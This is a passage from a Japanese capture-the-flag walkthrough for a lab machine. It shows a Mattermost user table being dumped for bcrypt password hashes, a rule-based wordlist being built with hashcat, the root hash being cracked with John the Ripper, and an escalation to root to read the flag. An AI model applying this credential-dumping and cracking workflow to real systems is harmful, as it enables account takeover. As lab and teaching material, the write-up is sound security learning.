| TermsOfService |
| ThreadMemberships |
| Threads |
| Tokens |
| UploadSessions |
| UserAccessTokens |
| UserGroups |
| UserTermsOfService |
| Users |
+------------------------+
46 rows in set (0.001 sec)
MariaDB [mattermost]> describe Users;
+--------------------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+--------------------+--------------+------+-----+---------+-------+
| Id | varchar(26) | NO | PRI | NULL | |
| CreateAt | bigint(20) | YES | MUL | NULL | |
| UpdateAt | bigint(20) | YES | MUL | NULL | |
| DeleteAt | bigint(20) | YES | MUL | NULL | |
| Username | varchar(64) | YES | UNI | NULL | |
| Password | varchar(128) | YES | | NULL | |
| AuthData | varchar(128) | YES | UNI | NULL | |
| AuthService | varchar(32) | YES | | NULL | |
| Email | varchar(128) | YES | UNI | NULL | |
| EmailVerified | tinyint(1) | YES | | NULL | |
| Nickname | varchar(64) | YES | | NULL | |
| FirstName | varchar(64) | YES | | NULL | |
| LastName | varchar(64) | YES | | NULL | |
| Position | varchar(128) | YES | | NULL | |
| Roles | text | YES | | NULL | |
| AllowMarketing | tinyint(1) | YES | | NULL | |
| Props | text | YES | | NULL | |
| NotifyProps | text | YES | | NULL | |
| LastPasswordUpdate | bigint(20) | YES | | NULL | |
| LastPictureUpdate | bigint(20) | YES | | NULL | |
| FailedAttempts | int(11) | YES | | NULL | |
| Locale | varchar(5) | YES | | NULL | |
| Timezone | text | YES | | NULL | |
| MfaActive | tinyint(1) | YES | | NULL | |
| MfaSecret | varchar(128) | YES | | NULL | |
+--------------------+--------------+------+-----+---------+-------+
25 rows in set (0.001 sec)
この中で気になるのは、id username passwordあたりだ。抜き出してみる。
MariaDB [mattermost]> select id, username, password from Users;
+----------------------------+----------------------------------+--------------------------------------------------------------+
| id | username | password |
+----------------------------+----------------------------------+--------------------------------------------------------------+
| 64nq8nue7pyhpgwm99a949mwya | surveybot | |
| 6akd5cxuhfgrbny81nj55au4za | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 6wkx1ggn63r7f8q1hpzp7t4iiy | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| dijg7mcf4tf3xrgxi5ntqdefma | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| e4i5d8rdwibcmgm35r5j3jxejh | limitedchan | $2a$10$K.q13JU.kZOMQWLW9IU8b.k8009yJMzan8tLREiZxhQw5aV.3TaNK |
| hatotzdacb8mbe95hm4ei8i7ny | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| jing8rk6mjdbudcidw6wz94rdy | channelexport | |
| n9magehhzincig4mm97xyft9sc | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------+----------------------------------+--------------------------------------------------------------+
8 rows in set (0.001 sec)
rootのpasswordハッシュを見つけることができる。
Hashcat
先ほどのチャットログと③の内容から、Hashcatでwordlistを作成する。
Please create a program to help us stop re-using the same passwords everywhere... especially those that are a variant of "PleaseSubscribe!"
PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.
┌──(kali㉿kali)-[~/Desktop/work]
└─$ touch pass.txt
┌──(kali㉿kali)-[~/Desktop/work]
└─$ vi pass.txt
┌──(kali㉿kali)-[~/Desktop/work]
└─$ cat pass.txt
PleaseSubscribe!
┌──(kali㉿kali)-[~/Desktop/work]
└─$ hashcat --stdout --force pass.txt -r /usr/share/hashcat/rules/best64.rule > passwordlist.txt
リストは以下のようになる。
┌──(kali㉿kali)-[~/Desktop/work]
└─$ cat passwordlist.txt
PleaseSubscribe!
!ebircsbuSesaelP
PLEASESUBSCRIBE!
pleaseSubscribe!
PleaseSubscribe!0
PleaseSubscribe!1
PleaseSubscribe!2
PleaseSubscribe!3
PleaseSubscribe!4
PleaseSubscribe!5
PleaseSubscribe!6
PleaseSubscribe!7
PleaseSubscribe!8
PleaseSubscribe!9
PleaseSubscribe!00
PleaseSubscribe!01
PleaseSubscribe!02
PleaseSubscribe!11
PleaseSubscribe!12
PleaseSubscribe!13
PleaseSubscribe!21
PleaseSubscribe!22
PleaseSubscribe!23
PleaseSubscribe!69
PleaseSubscribe!77
PleaseSubscribe!88
PleaseSubscribe!99
PleaseSubscribe!123
PleaseSubscribe!e
PleaseSubscribe!s
PleaseSubscribea
PleaseSubscribs
PleaseSubscriba
PleaseSubscriber
PleaseSubscribie
PleaseSubscrio
PleaseSubscriy
PleaseSubscri123
PleaseSubscriman
PleaseSubscridog
1PleaseSubscribe!
thePleaseSubscribe!
dleaseSubscribe!
maeaseSubscribe!
PleaseSubscribe!
PleaseSubscr1be!
Pl3as3Subscrib3!
PlaseSubscribe!
PlseSubscribe!
PleseSubscribe!
PleaeSubscribe!
Ples
Pleas1
PleaseSubscribe
PleaseSubscrib
PleaseSubscri
PleaseSubscriPleaseSubscri
PeaseSubscri
ribe
bscribe!easeSu
PleaseSubscri!
dleaseSubscrib
be!PleaseSubscri
ibe!
ribe!
cribcrib
tlea
asPasP
XleaseSubscribe!
SaseSubscribe!
PleaSu
PlesPles
asP
PlcrPlcr
PcSu
PleasS
PeSubs
rootのpasswordハッシュをrootpassという名前で保存しておこう。
┌──(kali㉿kali)-[~/Desktop/work]
└─$ touch rootpass.txt
┌──(kali㉿kali)-[~/Desktop/work]
└─$ vi rootpass.txt
┌──(kali㉿kali)-[~/Desktop/work]
└─$ cat rootpass.txt
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
John - Dictionary Attack
今回はJohnTheRipperを使用したが、Hashcatが使い慣れている場合はそちらでも構わない。
┌──(kali㉿kali)-[~/Desktop/work]
└─$ john --wordlist=passwordlist.txt rootpass.txt
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PleaseSubscribe!21 (?)
1g 0:00:00:00 DONE (2023-12-23 07:41) 1.388g/s 33.33p/s 33.33c/s 33.33C/s PleaseSubscribe!8..PleaseSubscribe!69
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
パスワードがPleaseSubscribe!21だと分かった。rootユーザーに変更する。
maildeliverer@Delivery:~$ su root
Password:
root@Delivery:/home/maildeliverer# whoami
root
rootと返ってきた。rootFlagもゲットできる。
root@Delivery:/home/maildeliverer# cd
root@Delivery:~# ls -lta
total 44
-r-------- 1 root root 33 Dec 26 11:01 root.txt
drwx------ 5 root root 4096 Dec 26 11:01 .
drwxr-xr-x 19 root root 4096 Jul 14 2021 ..
drwxr-xr-x 3 root root 4096 Jul 14 2021 .cache
drwxr-xr-x 2 root root 4096 Jul 14 2021 .vim
drwx------ 3 root root 4096 Jul 14 2021 .gnupg
lrwxrwxrwx 1 root root 9 Dec 28 2020 .bash_history -> /dev/null
-r-------- 1 root root 382 Dec 28 2020 note.txt
-rwxr-x--- 1 root root 103 Dec 26 2020 mail.sh
-rw-r----- 1 root root 1499 Dec 26 2020 py-smtp.py
-rw-r----- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
root@Delivery:~# cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のRootFlag
あとがき
今回は脆弱性を主として悪用するboxではなかったため、いつもと違ったboxのようで非常に特徴的でした。SQL・Hashcat・JohnTheRipperの復習にもなりました。